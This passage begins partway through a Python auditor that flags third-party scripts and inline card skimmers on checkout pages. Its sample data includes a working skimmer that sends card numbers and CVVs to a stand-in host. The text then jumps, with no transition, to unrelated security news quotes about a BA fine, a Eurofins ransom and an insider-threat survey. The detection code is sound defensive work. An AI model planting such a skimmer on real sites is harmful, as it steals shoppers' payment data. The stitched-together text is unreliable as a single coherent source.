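            if host not in allowed:
                findings.append(("unknown-script-host", host))
        else:
            reads_payment = bool(PAYMENT_FIELD_RE.search(body))
            sends_out = bool(EXFIL_RE.search(body))
            external = {h.lower() for h in URL_HOST_RE.findall(body)} - allowed
            if reads_payment and sends_out and external:
                findings.append(("inline-skimmer-pattern", ",".join(sorted(external))))
    return findings


# Constructed sample data: a known-good checkout page and the same page with an
# injected third-party script plus an inline skimmer appended before </body>.
PAGE_HOST = "shop.example"
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example"}

CLEAN_PAGE = """<html><body>
<script src="/js/checkout.js"></script>
<script src="https://cdn.shop.example/lib/jquery.js"></script>
<script>window.cfg = {currency: "GBP"};</script>
</body></html>"""

SKIMMED_PAGE = CLEAN_PAGE.replace("</body>", """
<script src="//static-cdn.example/tracking.js"></script>
<script>
document.querySelector('form').addEventListener('submit', function () {
  var d = {cc_number: document.getElementById('cc_number').value,
           cvv: document.getElementById('cvv').value};
  new Image().src = 'https://collect.example/i.gif?d=' + btoa(JSON.stringify(d));
});
</script>
</body>""")

if __name__ == "__main__":
    print("clean:", audit_page(CLEAN_PAGE, PAGE_HOST, ALLOWED_HOSTS))
    print("skimmed:", audit_page(SKIMMED_PAGE, PAGE_HOST, ALLOWED_HOSTS))
```

The point of the allowlist is that it is a baseline the site owner captures from a known-good deployment, so any new script host is a finding regardless of how innocuous its name looks; the inline heuristic is deliberately conjunctive (payment fields, an outbound call, and an unlisted host all present) to keep the noise down on pages with legitimate analytics. Protocol-relative sources such as `//host/path` are resolved to their host rather than treated as local, since that form is a common way to slip a third-party script past a naive "starts with http" check.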
Raef Meeuwisse, ISACA expert speaker and author, argued that commentators should refrain from passing judgement until the outcome of BA’s appeal is known.
“This fine is a timely wake-up call for enterprises that under-investment, especially in cybersecurity, is a false economy. It is also a reminder that you cannot just leave mission-critical third-party activities with anything less than mission-critical levels of verified security,” he said.
“However, I think we need to await the outcome of any appeal and what the final amount of the fine really is. If the amount reduces substantially during the appeals process, then the executives in other organizations who are just about to raise the risk-levels and investment in both data privacy and security will probably breathe a sigh of relief.”
The largest forensic services provider in the UK, Eurofins Scientific, has reportedly paid a ransom to criminals after its IT systems were disrupted in a cyber-attack. The amount of the ransom has not been disclosed, though BBC News reported that the attacks also resulted in the British police suspending its work with the global testing company.
Law enforcement agencies have refrained from sending new samples to Eurofins for analysis, according to reports. The Crown Prosecution Service told the BBC: “We are working to make sure all hearings remain fair and based on reliable evidence. While investigations are ongoing, prosecutors will assess the impact on a case-by-case basis. Cases where forensic evidence does not play a major role will continue as usual if all parties agree. If test results provided by Eurofins are central, we will seek to adjourn cases for the shortest possible period.”
Given that the investigation of the attack remains ongoing, Eurofins is refraining from commenting.
“This kind of attack was inevitable. While many security experts warn about paying ransoms or entering into negotiations, the answer in reality comes down to simple economics,” said Barry Shteiman, vice president of research and innovation at Exabeam.
“If the downtime caused by data being unavailable, or by the backup restoration process, is more expensive than paying the ransom, then organizations should pay. Equally, if giving up on the encrypted data has a higher cost in lost revenue or intellectual property than remediation, then you can also see why an organization would pay the ransom. Of course, this is a last resort, if all other options have been exhausted,” Shteiman continued.
Still, ransomware is only one type of attack that organizations need to protect against, said Derek James, regional director of EMEA for WhiteHat Security. “You need to protect against all threats, not one specific one. For the companies that are truly concerned about ransomware, in addition to vulnerability assessments, they can follow some easy industry best practices. Backing up data and using up-to-date encryption will help negate some of the risk of ransomware.”
A survey of 320 IT experts conducted by Gurucul found that one in 10 respondents admitted they would try to take as much company information with them as possible before they left their jobs. In addition, the survey found that 15% of participants would delete files or change passwords upon exiting.
While a number of organizations have invested in technologies to help detect and defend against external attackers, many companies are starting to better understand the risks from insider threats, which a recently published whitepaper said may actually be a larger issue.
According to the report, insider attacks are more difficult to detect and prevent than external ones, with 91% of respondents in a similar survey of IT and security professionals reporting that they feel vulnerable to both malicious and accidental insider threats.
“Gurucul mitigates these risks by employing behavioral analytics,” said Craig Cooper, COO of Gurucul. “By combining user and entity behavior analytics, and identity analytics, companies can not only monitor, detect and remove excess access before it is too late, but they can also monitor employee actions by detecting unusual or risky behavior. By detecting when users are acting in ways that contradict their normal behavior and job function, our customers are able to intervene.”
At issue is that teams are overloaded with identities and entitlements because of the manual processes built into static identity-management rules and roles. “It is more common than not that users inside the perimeter have access to information they do not need for their job. This gives them the capability to perform abusive tasks within the company. However, insider threats are not always caused by users within the organization. They can also occur when credentials of employees are shared or compromised, which often goes undetected,” wrote Gurucul’s Alison DeNisco Rayome in a July 2 blog post.